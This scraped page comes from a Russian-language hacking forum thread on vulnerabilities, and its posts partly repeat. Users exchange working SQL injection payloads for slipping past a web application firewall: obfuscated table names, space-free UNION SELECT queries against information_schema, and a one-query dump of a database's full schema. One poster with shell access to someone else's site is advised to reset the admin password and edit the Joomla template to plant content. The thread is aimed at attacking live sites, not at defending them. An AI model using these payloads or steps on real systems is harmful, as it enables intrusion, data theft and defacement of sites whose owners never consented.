Вопросы по уязвимостям - Страница 183

Guest · 13.03.2012, 21:12

durito,
попробуй LIMIT (сначала 0,1, потом 1,1 и т.д.)

Я проверить не могу

=====================

У меня такой вопрос: WAF фильтрует слово users, поэтому не получается достать инфу о пользователях. Можно ли в mysql закодировать имя таблицы?

faza02 · 13.03.2012, 21:16

Guest, /*!%0dusErs*/

Guest · 13.03.2012, 21:20

Не, такие варианты не прокатывают =(

WAF реагирует на строку users в любом регистре

Единственный шанс - это закодировать имя таблицы в запросе который обработает база.

Paul Kaplan · 13.03.2012, 21:21

У меня не сапа.
Если вкратце, то есть скрипт.php который вытаскивает текст с моего сервера и должен вывести его (текст) на странице форума или джумлы.
Доступа в админку нет, только шелл.
Инклудить в сам шаблон нельзя, так как там .tpl
Соответственно должен быть скрипт, который формирует страницу.
Его имя мне и нужно, дальше сам разберусь.

faza02 · 13.03.2012, 21:25

Paul Kaplan, замени пасс админу, если лень брутить существующий, будет тебе доступ.
site/templates/[имя установленного темпелейта]/index.php

xanxy · 13.03.2012, 21:34

Цитата:

Сообщение от faza02

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
как запрос составить полностью без пробелов? убрать около лимита его. на ачате мне сей секрет рассказывать не хотят.

union(select(1),2,3,GROUP_CONCAT(table_name),5,(6) from(information_schema.tables)WHERE(table_name)>= 0xXXX)

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit/**/1,1)

PS:
вот запрос чтоб всю структуру в один запрос вывести, без пробелов допилишь сам
SELECT @n FROM (select @n:=0x7c,(select null FROM (SELECT CONCAT_WS(0x2E,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME )w FROM information_schema.COLUMNS WHERE TABLE_SCHEMA NOT IN (0x6D7973716C, 0x696E666F726D6174696F6E5F736368656D61, 0x706572666F726D616E63655F736368656D61) ORDER BY w)y where @n:=concat(@n,0x0A,y.w) ))n

durito · 13.03.2012, 21:38

Цитата:

Сообщение от Guest

durito,
попробуй LIMIT (сначала 0,1, потом 1,1 и т.д.)

это mssql, limit тут нет

faza02 · 13.03.2012, 21:39

что ж вы мне пытаетесь /**/ всунуть
да, я знаю, еще можно %0a, %0d и так далее

Цитата:

union(select(1),2,3,GROUP_CONCAT(table_name),5,(6) from(information_schema.tables)WHERE(table_name)>= 0xXXX)

как выводить — спасибо, я еще до этого не дошел, мне бы пока разобраться с синтаксисом без пробелов в лимите

Jokester · 13.03.2012, 22:37

faza02 Лимит без пробела - никак, если нужно по одной записи то придётся группировать через where и уникальный ключ, как то так : where(id=1)

faza02 · 13.03.2012, 22:40

Jokester, спасибо.
https://rdot.org/forum/showthread.php?t=1243
вот еще тема всплыла, если кому-то понадобится, вроде разобрался.

13.03.2012, 22:37	#1829
Jokester Регистрация: 01.07.2010 Сообщений: 250 Репутация: 155	faza02 Лимит без пробела - никак, если нужно по одной записи то придётся группировать через where и уникальный ключ, как то так : where(id=1) __________________ ------------------

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

13.03.2012, 21:12	#1821
Guest Регистрация: 13.03.2012 Сообщений: 9 Репутация: 1	durito, попробуй LIMIT (сначала 0,1, потом 1,1 и т.д.) Я проверить не могу ===================== У меня такой вопрос: WAF фильтрует слово users, поэтому не получается достать инфу о пользователях. Можно ли в mysql закодировать имя таблицы?

13.03.2012, 21:16	#1822
faza02 Регистрация: 24.12.2010 Сообщений: 77 Репутация: 14	Guest, /!%0dusErs/

13.03.2012, 21:20	#1823
Guest Регистрация: 13.03.2012 Сообщений: 9 Репутация: 1	Не, такие варианты не прокатывают =( WAF реагирует на строку users в любом регистре Единственный шанс - это закодировать имя таблицы в запросе который обработает база.

13.03.2012, 21:21	#1824
Paul Kaplan Регистрация: 10.10.2011 Сообщений: 2 Репутация: 0	У меня не сапа. Если вкратце, то есть скрипт.php который вытаскивает текст с моего сервера и должен вывести его (текст) на странице форума или джумлы. Доступа в админку нет, только шелл. Инклудить в сам шаблон нельзя, так как там .tpl Соответственно должен быть скрипт, который формирует страницу. Его имя мне и нужно, дальше сам разберусь.

13.03.2012, 21:25	#1825
faza02 Регистрация: 24.12.2010 Сообщений: 77 Репутация: 14	Paul Kaplan, замени пасс админу, если лень брутить существующий, будет тебе доступ. site/templates/[имя установленного темпелейта]/index.php

13.03.2012, 22:40	#1830
faza02 Регистрация: 24.12.2010 Сообщений: 77 Репутация: 14	Jokester, спасибо. https://rdot.org/forum/showthread.php?t=1243 вот еще тема всплыла, если кому-то понадобится, вроде разобрался.